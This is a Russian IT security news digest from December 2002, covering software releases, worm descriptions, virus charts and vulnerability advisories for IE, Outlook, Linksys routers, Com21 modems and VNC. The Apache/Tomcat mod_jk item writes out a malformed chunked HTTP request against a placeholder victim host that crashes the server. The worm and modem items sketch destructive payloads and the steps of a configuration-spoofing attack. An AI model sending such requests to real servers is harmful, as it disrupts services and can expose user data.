"Лаборатория Касперского" объявила о выпуске полнофункциональной коммерческой версии персонального межсетевого экрана - Kaspersky Anti-Hacker, предназначенного для защиты домашних компьютеров от хакерских атак и предотвращения несанкционированного доступа к персональным данным. Kaspersky Anti-Hacker представляет собой фильтр между персональным компьютером и интернетом, который проверяет все входящие и исходящие информационные потоки и допускает только безопасные данные и действия. Таким образом, система, с одной стороны, защищает от хакерских атак из внешних сетей, а с другой - регулирует доступ установленных на компьютере приложений в интернет, предотвращая утечку информации даже в случае заражения самыми совершенными троянскими программами. Основной особенностью нового продукта, по словам разработчиков, стала его простота. Kaspersky Anti-Hacker позволяет определять правила безопасности для каждого из интернет-приложений, потоков данных (TCP, UDP, ICMP и др.), конкретных IP- адресов, веб-адресов и портов. Для управления программой существует 5 предустановленных уровней защиты. Владелец компьютера может самостоятельно выбрать желаемый уровень, не тратя времени на изучение подробностей конфигурации. Программа сама установит все необходимые настройки. Одновременно в программе существует возможность ручной установки параметров работы для продвинутых пользователей, а также система самообучения, которая автоматически настраивает Kaspersky Anti-Hacker в соответствии с установленным на компьютере ПО. При создании новых или модификации старых правил все изменения вступают в силу "на лету", не требуя перезагрузки программы. Подробности - http://www.kaspersky.ru/news.html?id=1096725
7/12/2002 15:41 Kaspersky™ Anti-Spam - первый российский продукт для борьбы со спамом.
"Лаборатория Касперского", ведущий российский разработчик систем информационной безопасности, сообщает о выпуске Kaspersky™ Anti-Spam - первого российского программного комплекса для защиты от нежелательных писем (спама). Продукт сочетает революционные технологии лингвистического анализа текстов, все современные методы фильтрации электронной почты и уникальный набор сервисов, которые позволяют пользователям распознать и уничтожить до 95% нежелательного трафика. Kaspersky Anti-Spam представляет собой фильтр, который устанавливается на "входе" в сеть предприятия и проверяет входящий поток писем на предмет обнаружения спама. Система фильтрации может быть реализована как на выделенном сервере, так и на существующем почтовом сервере. В первом случае Kaspersky Anti-Spam работает в качестве почтового буфера, проверяющего письма до их обработки почтовым сервером. Таким образом достигается максимальная совместимость решения защиты от спама с существующей компьютерной инфраструктурой. Во втором случае продукт может также выполнять и функции основного почтового сервера. Высокая эффективность Kaspersky Anti-Spam достигается благодаря четырехуровневому многоязычному (с поддержкой русского, английского, испанского, французского и немецкого языков) анализу входящей корреспонденции. Во-первых, письмо проверяется уникальным интеллектуальным ядром распознавания содержания письма SpamTest™, которое способно самостоятельно отличить различные типы спама от нормального делового сообщения. Во-вторых, используется сигнатурный метод, когда каждое письмо сравнивается с существующими шаблонами в ежедневно обновляемой базе данных. Эта база содержит образцы нежелательных писем и позволяет распознавать спам, даже если входное сообщение имеет некоторые отличия от оригинала. В-третьих, метод анализа по формальным признакам письма. Продукт имеет мощный набор интеллектуальных правил, позволяющих отличить спаммерское письмо по его "внешнему виду" - по способу рассылки, отправителю, адресу, пути следования и другим признакам. Наконец, Kaspersky Anti-Spam использует метод "чёрных списков" - стандартное средство фильтрации писем по адресам, признанным источниками спама и занесенными в постоянно обновляемые общедоступные списки. Подробнее о продукте - http://www.kaspersky.ru/news.html?id=1106425
6/12/2002 15:13 Активность вирусов за месяц от Sophos.
Приводим "альтернативный" хит-парад вирусов за прошлый месяц, составленный другой антивирусной компанией Sophos. Почти 30% всех сообщений о вирусах, поступивших за прошедший месяц в антивирусную компанию Sophos, относилось к вирусу Bugbear — это намного больше, чем у прежнего лидера Klez, который теперь фигурирует всего в 8% сообщений и занимает третье место. На втором месте червь Braid с 8,5% всех сообщений. «Bugbear второй месяц удается объегоривать пользователей за счет двойного режима атаки, — говорит старший инженер-консультант Sophos Грэм Клули (Graham Cluley). — Этот червь способен распространяться как по e-mail, так и через сетевые диски. Важно, чтобы все пользователи установили защиту от Bugbear, так как он имплантирует код, регистрирующий нажимаемые ими клавиши. Это означает, что хакерам видно все, что вы печатаете: пароли, реквизиты банковских счетов и номера кредитных карт». Подробности - http://zdnet.com.com/2100-1105-975673.html
6/12/2002 15:08 Выход Opera 6.11 для Linux.
Норвежская фирма Opera Software ASA выпустила новую версию своего броузера Opera для ОС Linux. Исправлены ошибки в обработке баннеров, которые могли, в некоторых случаях, привести к падению броузера. Страница загрузки - http://www.opera.com/download/?platform=linux
6/12/2002 14:28 Очередной выпуск онлайнового обозрения NAG.RU
Вышел очередной, 114-й выпуск онлайнового обозрения NAG.RU, редактируемого Павлом Нагибиным и посвященного ethernet-провайдингу и телекоммуникациям. В выпуске - размышления о ситуации с прекращением отдельными провайдерами пиринговых отношений и роли контента в связи с этим, а также описание IolaPLN - недорогого устройства, позволяющего организовать двухкилометровый мегабитный линк по обычной телефонной паре. Обозрение - http://www.nag.ru/
6/12/2002 14:05 "Умный" email-адрес сам победит спам.
Американский специалист по компьютерам разработал новый тип программного обеспечения, самостоятельно генерирующего уникальный электронный адрес для каждого сообщения. Новая разработка позволит раз и навсегда победить спам, заявляет ее создатель. В уникальном адресе содержится зашифрованная информация о том, кто сможет ответить на это сообщение, а также сколько его копий может быть разослано и в какой промежуток времени. Например, пользователь, подписавшийся на новостную ежемесячную рассылку, указывает их источник и количество - 12 сообщений в течение года. Даже если спамерам удастся раздобыть адрес, их "мусор" будет блокирован еще до того, как попадет в почтовый ящик абонента. "Система адресации "Single Purpose" (однократного действия) позволяет ограничить спам, блокируя его еще до того, как он попадет к пользователю", - поясняет автор изобретения Джон Иоаннидис (John Ioannidis), сотрудник исследовательской лаборатории AT&T в Нью-Джерси. В настоящее время уже существует ряд онлайновых сервисов, которые формируют для пользователей электронные адреса однократного действия, например, SpamEx и SneakMail, но ни один из них еще не предлагал пользователям возможности ограничения количества возможных репликаций адреса. Адреса системы Single Purpose содержат несколько десятков символов перед символом @. Разрешенные абонентом условия репликации зашифрованы секретным ключом, так что спамерам до него не добраться. Несмотря на нечитабельный внешний вид, адреса эти с легкостью распознаются компьютером. Их можно размещать даже на интернет-сайтах без опасения быть в ответ заваленным грудами спама. А для личной переписки можно использовать намного более простой адрес "многократного действия". Источник - http://www.cnews.ru
6/12/2002 13:42 Официальный релиз PGP 8.0.
Американская компания PGP Corporation выпустила окончательную версию программного обеспечения PGP 8.0. Это первый релиз PGP, с тех пор как компания Network Associates, владеющая патентом на PGP ("Pretty Good Privacy"), из-за убыточности бизнеса отказалась от дальнейшего участия в проекте и продала PGP Corporation все права и свою долю. В состав PGP 8.0 входят несколько пакетов. PGP Desktop 8.0 для Windows и Macintosh имеет улучшенный пользовательский интерфейс и позволяет интегрировать функции шифрования в основные офисные и почтовые программы, в программы мгновенной отправки сообщений Novell GrouрWise и поддерживает системы Microsoft Active Directory, iPlanet Directory Server, Novell NDS. PGP Enterprise 8.0 - более мощное ПО, позволяющее администрировать работу пользователей с ключами, вести политику безопасности, имеющее интерфейс для работы со смарт-картами, поддерживающее сертификаты и т.д. PGP Personal 8.0 включает в себя программы PGP Disk и PGP Mail для защиты файлов, дисков и почты. PGP Freeware 8.0 представляет из себя бесплатную PGP Mail без возможности использования в качестве плагина с почтовыми программами или интернет-пейджерами. Взято с www.securitylab.ru Cайт проекта - http://www.pgp.com
6/12/2002 13:39 Патч от Microsoft не устраняет полностью уязвимости IE.
Тор Лархолм (Thor Larholm), исслдователь безопасности из PivX Solutions, LLC в своём письме в BUGTRAQ утверждает, что выпущенный позавчера кумулятивный патч Microsoft MS02-068, закрывающий якобы бреши в системе безопасности Internet Explorer, на самом деле не до конца перекрывает эти самые бреши. Автор по пунктам разбирает описание Microsoft, утверждая при этом, что софтверный гигант, мягко говоря, лукавит, описывая некоторые (якобы устранённые) уязвимости и всё на самом деле выглядит намного серьёзнее. Констатируя выход за последние 2(!) недели 2-х кумулятивных патчей, Тор в конце письма приводит ссылку на свою страницу в Интернете с детальным описанием текущих уязвимостей IE. Примечательно, что количество их составляет 18, из которых 6 имеют статус очень серьёзных (severe). Уязвимости IE - http://www.pivx.com/larholm/unpatched/
6/12/2002 13:05 Уязвимость в Apache и Tomcat.
Команда Qualys Security Research обнаружила уязвимость, присутствующую на Вэб-сервере, построенном в связке Apache, Tomcat, mod_jk. Tomcat - open-source сервер, выпускаемый в рамках проекта Jakarta (http://jakarta.apache.org) для полнофункциональной поддержки платформы Java. Выпускаемый Tomcat 4 поддерживает технологии Servlet 2.3 и JavaServer Pages 1.2. Модуль апача mod_jk, в свою очередь, предназначен для прозрачной передачи Вэб-запросов от сервера Apache движку Tomcat (для дальнейшей обработки). Поддерживает многие протоколы, в том числе Apache Jserv Protocol 1.3 (AJP13). Уязвимость связана с некорректной обработкой этим модулем Вэб-запросов "chunked encoded" с неправильным телом сообщения. Автор предлагает следующий вид запроса: GET /index.jsp HTTP/1.1 / Host: victim.com / Transfer-Encoding: Chunked / 53636f7474. Из-за неверной обработки подобных запросов нарушается функционирование сервера, для восстановления которой требуется вмешательство администратора. Кроме того, природа уязвимости позволяет получить частную (закрытую) информацию о пользователях сайта. Обнаружена на следующих версиях: mod_jk 1.2, Apache 1.3.x, Tomcat 4.x Server. Для устранения уязвимости рекомендуется обновиться до внось выпущенной версии модуля mod_jk 1.2.1. Источник - http://www.qualys.com
6/12/2002 9:40 Новый червь Galil.
Обнаружен новый сетевой червь "Galil". На данный момент уже зарегестрированы случа рассылки данной вредоносной программы. Galil распространяется через Интернет в виде файлов, прикрепленных к зараженным письмам. Он состоит из нескольких компонент, все из них являются приложениями Windows (PE EXE-файлы), написаны на Visual Basic. Червь ищет адреса-жертвы в адресной книге MS Outlook и в файлах с расширениями имени ".htm" и ".html", обнаруженные адреса сохраняются в файле "Mmails.dll". При рассылке зараженных писем червь использует прямое подключение к SMTP-серверу. Червь активизируется только если пользователь сам запускает зараженные файл (при двойном щелчке на вложении). Затем червь инсталлирует себя в систему и запускает процедуры своего распространения. Червь создаёт в системном реестре файл-счетчик, который увеличивается при каждом запуске червя: HKLM\iLLeGal. При достижении счетчиком значения "5" червь уничтожает все файлы на дисках D: E: F: G: и затем выводит сообщение: "ZaCker. No Peace Without war,i hate war but im forced to love it, Hidden Power's gonna b there wherever u r". Источник - http://www.viruslist.com
6/12/2002 9:28 13 декабря вирус Kilonce уничтожает все файлы на диске C:.
В ноябре в Китае обнаружен вирус-червь Kilonce, который распространяется по локальным сетям, если в них есть ресурсы, открытые на полный доступ. Червь является приложением Windows (PE EXE-файл), написан на Delphi. В зависимости от версии имеет размер 40Kb (упакован UPX) или 82K (если не упакован). Kilonce противодействует антивирусным программам. Для этого ищет процессы, в которых присутствуют комбинации "KV" или "AV" и принудительно завершает их работу, а затем удаляет на диске соответствующий EXE- файл. Тоже самое совершает с процессом "LOAD.EXE" (если такой запущен). Червь добавляет пользователя "Guest" в список администраторов и открывает все диски компьтера на полный доступ. 13 декабря записывает в файл C:\AUTOEXEC.BAT команду уничтожения всех файлов на диске C:. При инсталляции червь копирует себя с именем "KILLONCE.EXE" в системный каталог Windows и в каталог "Recycled" на том же диске, где установлена Windows, и регистрирует свои копии в ключах авто-запуска системного реестра. Источник - http://www.viruslist.com
6/12/2002 9:20 Американский суд сурово обошелся с создателем липовых интернет- технологий.
В США вынесен приговор мошеннику, продававшему несуществующую интернет-технологию, сообщает Newsru.com. 44-летний Стивен Аллен Ристау приговорен к 11 годам тюрьмы и оштрафован на $ 6 млн. Соответствующее постановление вынес суд округа Санта-Клара штата Калифорния. Г-н Ристау, являющийся основателем и президентом компании "Пакэт Свич", предлагал купить новую беспроводную систему, позволяющую транслировать фильмы через интернет на принимающие устройства с расстояния до 20 км. В действительности же компания "Пакэт Свич" имела в наличии обычный плейер. Он мог получать сигналы из локального пункта по беспроводной системе через глазок, скрытый в потолочной части здания на расстоянии нескольких метров. Источник - http://www.newsru.com/
5/12/2002 15:42 Очередной кумулятивный патч к Internet Explorer.
4 декабря Microsoft выпустила бюллетень по безопасности с кодовым обозначением MS02-068, в котором анонсируется выпуск очередного кумулятивного патча для броузера Internet Explorer версий 5.5 и 6.0. Помимо включения функциональности всех предыдущих патчей, он также устраняет уязвимость, обнаруженную в модели кросс-доменной безопасности IE. Уязвимость позволяет сайтам в одном домене обращаться к информации другого домена, включая локальную систему пользователя. Эксплуатация уязвимости может позволить удалённому атакующему получить доступ к локальным файлам пользователя, однако не позволяет изменять их. Кроме того, удалённый атакующий может вызвать выполнение локальных файлов. Подробности - http://www.microsoft.com/technet/security/bulletin/ms02-068.asp
5/12/2002 15:04 DoS против Outlook 2002 (патч).
При работе с полученными почтовыми сообщениями, Outlook обрабатывает информацию, содержащуюся в почтовом заголовке, которая содержит информацию об источнике электронного сообщения, его адресата и атрибуты сообщения. Уязвимость обнаружена в механизме обработки почтового заголовка. Атакующий может послать специально сформированное почтовое сообщение пользователю Outlook 2002, которое приведет а аварийному завершению работы программы. Для восстановления нормальной работы потребуется удаление почтового сообщения с почтового сервера или используя другой почтовый клиент, отличный от Outlook 2002. Уязвимость обнаружена в Outlook 2002 Подробности - http://www.securitylab.ru/?ID=34747
5/12/2002 14:26 Microsoft: Windows 2000 дешевле, чем Linux.
В понедельник Microsoft опубликовала результаты выполненного по ее заказу исследования IDC, в котором заключается, что эксплуатация и техническое обслуживание Windows 2000 в целом обходится предприятиям дешевле, чем Linux. Аналитик IDC Эл Джиллен (Al Gillen) утверждает в своем отчете, что расходы на персонал, поддерживающий Linux-серверы в рабочем состоянии, намного перевешивают преимущества от возможности получить это ПО бесплатно или по низкой цене. «Общая стоимость серверной системы включает стоимость аппаратуры, ПО и поддержки. Целью исследования было определение расходов на поддержку операционной платформы за некоторый период времени. Главной составляющей этих расходов оказалась стоимость персонала». Аналитик IDC Эл Джиллен (Al Gillen) утверждает в своем отчете, что расходы на персонал, поддерживающий Linux-серверы в рабочем состоянии, намного перевешивают преимущества от возможности получить это ПО бесплатно или по низкой цене. «Общая стоимость серверной системы включает стоимость аппаратуры, ПО и поддержки. Целью исследования было определение расходов на поддержку операционной платформы за некоторый период времени. Главной составляющей этих расходов оказалась стоимость персонала». Честно говоря, объективность сделанного по заказу (!!!) Microsoft вызывает очень большие сомнения. Впрочем, по приведённой ниже ссылке Вы можете посмотреть полный текст статьи. Подробности - http://www.zdnet.ru/?ID=292622
5/12/2002 13:06 Intel: новые компиляторы для оптимизации НТ-приложений.
3 декабря Intel представил обновленные инструментальные средства, призванные помочь разработчикам ПО в оптимизации приложений для растущего семейства архитектур Intel, в которых использованы такие нововведения, как технология Hyper-Threading. По словам разработчиков, использование версий 7.0 компиляторов Intel C++ и Fortran для ОС Windows и Linux позволяет достичь выигрыша в производительности приложений для систем на базе процессоров Intel Itanium 2, Xeon и Pentium 4 до 40% по сравнению с применением существующих компиляторов других производителей. Создание новых программных инструментов стало возможным благодаря активной деятельности ряда коллективов разработчиков Intel. Существенный вклад в реализацию новой версии компиляторов и повышение их качества внесли специалисты компании "ВНИИЭФ-СТЛ" (г. Саров) и российского Центра Intel по разработке программного обеспечения (г. Нижний Новгород). С помощью компиляторов разработчики программного обеспечения преобразуют программы, написанные на языках программирования высокого уровня (например, C++ или Fortran), в программы на "машинном" языке, понятном процессору. Чем эффективнее компилятор, тем выше производительность приложений. Компиляторы Intel помогут разработчикам программного обеспечения повысить эффективность создаваемых приложений для вычислительных и телекоммуникационных систем на базе процессоров Intel. Источник - http://www.cnews.ru/
5/12/2002 10:24 Статья "Увеличение производительности жесткого диска с помощью утилиты hdparm".
На сайте gazette.linux.ru.net опубликован качественный перевод Андрея Киселева оригинальной статьи "Improving Hard Disk Performance with hdparm". Оригинальная статья была написана Питером Панком (Piter Punk) из Бразилии, затем переведена с португальского на английский Уильямом Занаттой (William N. Zanatta) и вот, наконец то переведена на русский язык. Описывает возможность настройки характеристик жёсткого диска при помощи Linux-утилиты hdparm, являющейся мощным средством настройки параметров работы жесткого диска. Зачастую настройки жесткого диска по умолчанию далеки от оптимальных, поэтому вполне может возникнуть желание изменить их. С помощью утилиты hdparm, как по мановению волшебной палочки, можно поднять производительность жесткого диска до максимума. Рекомендуется к прочтению как пользователям Linux, так и СИСАДМИНам. Статья - http://gazette.linux.ru.net/lg79/punk.html
5/12/2002 10:11 Вирусная двадцатка ноября.
"Лаборатория Касперского" опубликовала вирусную двадцатку ноября. Согласно ей, на первых трёх местах стоят черви (в порядке убывания распространённости): Lentin - 27,7%, штамм H червя Klez - 23,4%, Tanatos - 3,2%. Источник - http://www.kaspersky.ru/news.html?id=1105917
5/12/2002 10:06 ISS меняет политику оповещения.
Internet Security Systems (ISS), организация, занимающаяся поиском уязвимостей в различных продуктах, объявила о смене своей политики. В апреле этого года компания опубликовала сведения о "дыре" в Web- сервере Apache, дав его разработчикам всего четыре часа для реакции. Это вызвало волну недовольства, поэтому отныне ISS не будет делать различий между разработчиками "открытого" и "закрытого" ПО и будет оповещать их об обнаруженных ошибках по одной и той же схеме. Это означает, что сведения о новых уязвимостях станут доступны широкой публике не ранее, чем через 30 дней после уведомления разработчиков. Подробности - http://news.zdnet.co.uk/story/0,,t289-s2126897,00.html
4/12/2002 16:48 Пресс-конференция управления "Р" МВД.
Ущерб от деятельности "телефонных пиратов" в текущем году в Москве превысил $10 млн. Об этом сообщил вчера на пресс-конференции начальник управления "Р" ГУВД Москвы Дмитрий Чепчугов. Преступники используют новейшие электронные устройства подмены телефонного номера, и в итоге счета за телефонные переговоры приходят людям, которые эти разговоры не совершали. По словам Дмитрия Чепчугова, в этом году в столице сотрудниками милиции было выявлено и закрыто более 150 нелегальных переговорных пунктов. Для эффективной борьбы с "телефонным пиратством", по словам Дмитрия Чепчугова, телефонным компаниям необходимо внедрять новые системы, позволяющие бороться с устройствами подмены телефонного номера. Управление "Р" отчиталось сегодня также и о своей работе по поиску сайтов чеченских боевиков, зарегистрированных за границей. По словам г-на Чепчугова, в рамках проводимых в России контеррористических мероприятий управление "Р" ГУВД Москвы ведет активную работу в этом направлении. Все эти сайты, сказал он, зарегистрированы на территории других стран, поэтому после обнаружения "террористических сайтов" в интернете управление "Р" направляет соответствующуюинформацию в МИД России, чтобы оно выступило с соответствующей нотой в адрес страны, на территории которой зарегистрирован такой сайт. Дмитрий Чепчугов сообщил, что, например, сайт "Кавказ-Центр" был зарегистрирован на территории Канады, а сайт "Чечен-Пресс" - на территории одной из арабских стран. Он отметил, что после событий с мюзиклом "Норд-Ост" данные сайты прекратили свою деятельность. Источник - http://www.rbc.ru
4/12/2002 16:21 Обход ограничений зоны безопасности в Internet Explorer 6.0.
Как сообщает корейский исследователь безопасности Liu Die Yu , специально оформленный сценарий может обратиться к данным других доменов, в том числе и к "Local computer zone" когда назначается стиль текста в окне (окно "ModalDialog") открытым "showModalDialog()". Этот способ назван автором "Poisonous Style for Dialog window". уязвимость проверена в Internet Explorer 6.0 с патчами Q312461,Q328790(MS02-066) (IEXPLORE.EXE file version: 6.0.2600.0000, MSHTML.DLL file version: 6.00.2600.0000). Демонстрация уязвимости - тут
4/12/2002 15:53 Уязвимость в Linksys-маршрутизаторах.
CORE Security Technologies сообщает об обнаружении уязвимости в маршрутизаторах Linksys BEFW11S4, применяемых в беспроводных сетях (также констатируется наличие уязвимости в остальных сетевых устройствах Linksys). Первая уязвимость связана с неверной разборкой передаваемых URL и позволяет удалённому атакуещему получить доступ к любой странице Веб-ориентированного интерфейса настройки роутера. Вторая уязвимошсть связана с возможностью переполнения буфера на стеке с дальнейшим выполнением произвольных команд, которые могут привести к получению полного контроля над маршрутизатором. Linksys выпущены соотвествующие обновления программного обеспечения. Подробности - http://www.corest.com/common/showdoc.php?idx=263&idxseccion=10
4/12/2002 11:48 Выход Mozilla 1.2.1.
Объявлено о выходе новой, обновлённой версии релиза 1.2.x броузера Mozilla. Исправлен серьёзный баг в версии 1.2, связанный с некорректным отображением DHTML-страниц. Подробности - http://www.mozilla.org/releases/mozilla1.2.1/
4/12/2002 11:39 Запуск проекта RC5-72.
3 декабря официально стартовал очередной проект distributed.net, а именно, RC5-72. Новый клиент доступен для скачивания, как только появится статистика, появится соответствующая страница и на командном сайте. Релиза Personal Proxy пока нет, но поддержка rc5-72 обещана начиная с 330-го билда. На странице пререлизов лежит билд 331. Взято с www.bugtraq.ru. Cтраница загрузки клиента - http://www.distributed.net/download/clients.html Страница команды HZTeam - http://dnet.bugtraq.ru/
4/12/2002 11:03 Унификация цифровой подписи в России.
ФГУП НТЦ "Атлас", ООО "Крипто-Про", ООО "Фактор-ТС", ЗАО "МО ПНИЭИ" и ОАО "Инфотекс" объявили "об объединении усилий в целях достижения взаимной совместимости продуктов, комплексных решений в области построения защищенных информационных и телекоммуникационных систем, разработанных на основе технологии цифровых сертификатов открытых ключей и сертифицированных средств криптографической защиты, реализующих алгоритмы ГОСТ Р 34.10-94,ГОСТ Р 34.10-2001, ГОСТ Р 34.1 1-94 и ГОСТ 28147-89." Говоря нормальным языком, речь идет о стандартизации формата сертификатов открытых ключей и электронных подписей, причем за основу было решено взять решения Крипто-Про. Участники направили просьбу к ФАПСИ "учитывать положения, приведенные в настоящем Соглашении при согласовании технических заданий на разработку средств криптографической защиты и программных комплексов, использующих технологии цифровых сертификатов открытых ключей". Так что, учитывая состав участников соглашения и вполне вероятную поддержку ФАПСИ, у нового формата есть все шансы стать действительно стандартным. Источник - http://www.bugtraq.ru/rsn/archive/2002/12/04.html
3/12/2002 13:43 Выход mod_python 3.0.1.
Apache Software Foundation совместно с Apache HTTP Server Project объявили о выпуске новой версии модуля сервера Apache mod_python. Этот модуль позволяет писать скрипты для интерпретатора Python. Cчитается, что веб-приложения, написанные на Python работают быстрее традиционных CGI-приложений. Новая версия обеспечивает совместимость с версией Апача 2.х. Загрузить можно отсюда - http://www.apache.org/dist/httpd/modpython/
3/12/2002 13:28 Cтатья "Инсталляция PHP в Apache".
На сервере linuxnewbie.org опубликована статья "PHP and Apache Intro", детально описывающая шаги по "прикручиванию" языка скриптов PHP3 для работы с Вэб-сервером Apache. Предназначена для новичков, имеющих, однако навык работы в Linux. Cтатья - http://www.linuxnewbie.org/nhf/Webservers/PHP_and_Apache_Intro.html
3/12/2002 13:20 В Швеции прошел самый крупный в мире слет хакеров.
DreamHack - это крупнейший всемирный слет (lan-party) хакеров и геймеров. Он проводится в Швеции дважды в год, начиная с 1997 года. Устроителем шоу является DreamHack Organizing, а спонсорами DreamHack Winter 2002 в этом году выступили Microsoft, ASUS и шведский провайдер широкополосного интернет-доступа Arrowhead. В этот раз lan-party проводился в городе Йончёпинг, во дворце Tipshallen. Более 5000 человек привезли свои личные компьютеры, чтобы в течение 4 дней (с 28 ноября по 1 декабря) посоревноваться в программировании, провести турниры по компьютерным играм, встретиться с онлайновыми друзьями, обменяться нужными файлами. Каждому участнику предоставлялся компьютерный стол и выход в локальную сеть (5000 портов на 10/100 Мбит, для которых потребовалось около 70 километров сетевого кабеля). Локальная сеть имела выход в интернет со скоростью передачи данных в 1 Гбит/с. На огромном экране Barco общей площадью 48 квадратных метров круглые сутки демонстрировались написанные участниками программы, отображалась различная важная информация, показывались видеоклипы, кинофильмы, рекламные ролики, финальные матчи игровых турниров, результаты соревнований и многое другое. В распоряжении собравшихся были мощные игровые сервера с процессорами Intel Itanium. Подробности и фотографии - http://www.compulenta.ru/2002/12/3/36008/
3/12/2002 12:21 VNC Man in the Middle Exploit.
Используя код эксплоита, атакующий может заставить клиента подтвердить подлинность через хост посредника, который переадресовывает пользователя на сервер. Исходник - http://www.SecurityLab.ru/?ID=34688
3/12/2002 12:12 Уязвимость в кабельных модемах Com21.
David LaganiХre из канадской группы Lag Security обнаружил уязвимость во всех кабельных модемах Com21 DOXport 1110 с ПО версии 2.1.1.106, применямых многих ISP (по крайней мере в Канаде). Эти модемы позволяют любому пользователю занрузить через протокол TFTP (Trivial FTP) cобственный конфигурационный файл, в котором можно задать сосбвенный номер CPE, cкорость дайнлоада/аплоада и другие конфигурационные опции. Для осуществления атаки автор использовал следующий набор инструментов: программу docsis (формирует конфигурационный файл для кабельного модема согласно стандарта DOCSIS - http://docsis.sourceforge.net/), сниффер tcpdump (для определения требуемых загружаемых параметров), SNMP-клиент (для определения внутреннего IP модема). После применения всех этих инструментов был создан фальшивый DHCP-сервер, с корого и осуществлялась загрузка требуемого файла конфигурации. В качестве меры противодействия предлагается обновиться на версию ПО 2.1.1.108.003. Автор также не исключает подобной уязвимости в других моделях кабельных модемов. Подробное описание - http://lag.securinet.qc.ca/papers.html
3/12/2002 11:43 10 простейших способов остановить хакера.
Сайт SecurityNewsPortal опубликовал статью под названием "10 simple ways to stop hackers or at least slow them down". В статье описываются наиболее типичные уязвимости, а также (как следует из названия) наиболее общие методы и способы, которые если не закроют полностью вашу систему, то хотя бы затруднят работу хакера, пытающегося взломать вашу систему. Вкратце эти методы заключаются в следующем: применение специальных тестов сканирования вашего сервера и защищаемой сети, применение тестов на уязвимость при помощи специальных инструментов (Nessus, SARA, SAINT etc.), информирование пользователей сети о возможных уязвимостей (в т.ч. для предотвращения методов социальной инженерии), правильное конфигурирование файрволлов и независимая их проверка (любой открытый порт является открытой дверью в вашу сеть), применение политики сильных (криптостойких) паролей, удаление всех комментариев с исходного кода страниц открытых веб-сайтов, удаление скриптов, поставляемых по умолчанию со многими Веб-серверами и т.д. Рекомендации, конечно же, достаточно общие, но заинтересованные лица могут ознакомиться с ними по ссылке ниже. Статья - http://www.securitynewsportal.com/cgi-bin/cgi-script/csNews/...
3/12/2002 11:30 Проблема троянов в исходниках.
В статье под названием "Open-Source Trojans: A Growing Problem?" обсуждается проблема увеличивающегося в крайнее время количества троянов в исходниках некоторых программ, поставляемых на принципах Open Source. Достаточно вспомнить обнаружение троянцев в tcpdump, sendmail, о чём в свой время оповещал широкую общественность CERT. Как следует из завялений экспертов, распространение троянцев происходит в основном из-за пренебрежения сисадминов к элементарным мерам безопасности. Среди них отмечается использование хэша MD5. Обычно на сайте производителя программы помимо исходного кода программы указывается содержимое её MD5-хэша. Для проверки можно использовать свободно доступные программы и утилита, как MD4, SHA и SHA-1 (в Linux - md5sum). В статье приводятся мнения экспертов - Dave Wreski, корпоративного менеджера компании Guardian Digital и Fred Cohen, консультанта по безопасности фирмы Fred Cohen & Associates. Подробности - http://www.infosecuritymag.com/2002/nov/digest21.shtml#news4
3/12/2002 10:57 Anti-Copyright FAQ или 18 вопросов об авторском праве.
На сайте Московского Либертариума появилась интересная статья математика Федора Зуева. В статье Федор проводит анализ текущего состояния дел в российском законодательстве и того, что нам предлагают софтверные компании (лицензии и т.д. и т.п.). Взято с www.lrn.ru. Подробности - http://www.libertarium.ru/libertarium/Anti-Copyright-FAQ
3/12/2002 10:13 В linux kernel 2.4.20 обнаружена ошибка, которая может привести к потере данных.
Внесенные в код функции ext3 fsync в 2.4.20-pre5 оптимизации могут привести к потере данных, в момент размонтирования, если ext3 эксплуатируется в режиме "data=journal" или "chattr -j". Взято с www.opennet.ru. Подробности и патч - http://www.kerneltrap.com/node.php?id=515
2/12/2002 18:21 На сайте новый документ: Описание команд сервиса NickServ irc-сети Русский DalNet.
Документ описывает синтаксис и правила работы с командами этого сервиса. Для каждой команды приведен пример использования. Ознакомиться: http://www.uinc.ru/articles/translations/001.shtml
2/12/2002 14:12 Cтатья по установке и настройке Apache.
Компания OpenNA опубликовала статью Герхарда Моурани под оригинальным названием "How to Build, Install, Secure & Optimize Apache 2.x". Как следует из названия посвящена установке и настройке новой версии популярного Вэб-сервера Apache - версии 2.х. В статье даны пошаговые инструкции по сборке сервера из исходников, настройке, подключению компонентов, расширяющих функциональность сервера (mod_ssl, mod_perl, PHP4, SQL и т.д.). Значительное внимание уделено безопасности Apache. Cтатья - http://www.openna.com/documentations/articles/apache/index.php
2/12/2002 13:46 Корпорация AOL готовит к выпуску собственный почтовый клиент.
America Online разрабатывает новое коммуникационное приложение. Программа носит название AOL Communicator (beta M10). Это вполне самостоятельная программа, и чтобы ей пользоваться, необязательно быть клиентом AOL. С первого взгляда очевидны родственные отношения между AOL Communicator и почтовым клиентом, входящим в состав Netscape 7 или Mozilla. Это неслучайно, так как программа действительно основана на коде Mozilla Mail. Впрочем, есть и различия. Разработчики AOL Communicator, судя по всему, отказались от языка построения интерфейсов XUL, использованном в Netscape и Mozilla, заменив его стандартными элементами управления Windows. По всей видимости, это сделано, чтобы уменьшить требования, предъявляемые программой к скорости процессора и объёму памяти. По существу же, главное отличие AOL Communicator от Mozilla Mail - это наличие интегрированного интернет-пейджера. Как известно, America Online, помимо купленного некогда Netscape, принадлежат две службы мгновенных сообщений: ICQ, которую корпорация заполучила после поглощения израильской фирмы Mirabilis, и AOL Instant Messenger (AIM) собственной разработки. AOL Communicator поддерживает и AIM и, что особенно важно для российских пользователей, ICQ. Впрочем, до заявленной "полной интеграции" пока что далеко. Интеграция не достигает даже уровня Outlook Express, объединившего встроенную панель с адресами и контакт-лист MSN Messnger. Всё, что может предложить AOL Communicator - это кнопку вызова интернет-пейджера в левом нижнем углу главного окна программы. Во внешнем виде AOL Communicator нет ничего необычного. Он стандартен для большинства почтовых программ - обычные кнопки на верхней панели, окошко входящих сообщений, слева - дерево папок, внизу - панель предварительного просмотра. Единственное нововведение - это кнопка "Спам". При ее нажатии полученное письмо классифицируется как спам и отправляется в соответствующую папку. Есть и интеллектуальная система отсеивания спама. Она следит за письмами, которые помечаются как спам, и в дальнейшем, руководствуясь предпочтениями пользователя, может сама сортировать письма. Если она неправильно классифицировала письмо, можно снять с него пометку "Спам", что также способствует ее "обучению". Подобная система фильтрации спама войдёт в следующую версию Mozilla Mail. Системные требования AOLC beta M10: ОС Windows, 128 Мб ОЗУ (рекомендуется), 40 Мб на жестком диске. Процессор: Intel Pentium 133 и выше (для Windows 2000), Pentium/Celeron или К6/Athlon/Duron 300МГц или выше. Будет программа бесплатной, или нет, пока не сообщается. Cкачать - http://www.tech-critic.com/downloads/AOLComunicator.rar
2/12/2002 12:40 Выход openwall-патча для ядра 2.4.20.
